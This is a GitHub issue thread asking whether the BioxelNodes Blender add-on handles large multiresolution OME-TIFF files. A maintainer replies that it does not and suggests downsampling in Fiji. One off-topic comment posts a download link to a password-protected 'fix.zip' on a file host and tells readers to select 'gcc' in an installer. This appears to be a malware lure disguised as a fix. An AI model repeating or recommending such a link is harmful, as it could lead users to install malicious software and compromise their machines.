### ISSUE TITLE
Is multiresolution file supported

### ISSUE THREAD

**Issue by NicoKiaru** [OmooLab/BioxelNodes#40]
Sorry to ask without even trying, but I looked at the documentation and couldn't find the answer to this:
- is there a multi-resolution support generally speaking and for ome-tiff in particular ? I have a big multiresolution ome tiff file (200Gb, 3D, not 4D)  with multiple resolution levels and I would like to know if there's a chance BioxelNodes could be reactive with such a dataset

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by icrdr** [comment]
Many of the data files on research are so huge that they are completely more than blender can handle, without doing any memory management. 

I have thought about making a small pop-out window for previewing before importing, allowing the user to import only a tile, or low resolution of the data. But for now, you may need to rely on software like fiji(imageJ) to reduce the size of the data, and then import it into Blender using the Bioxel node.

**Comment by NicoKiaru** [comment]
Thanks for the information!
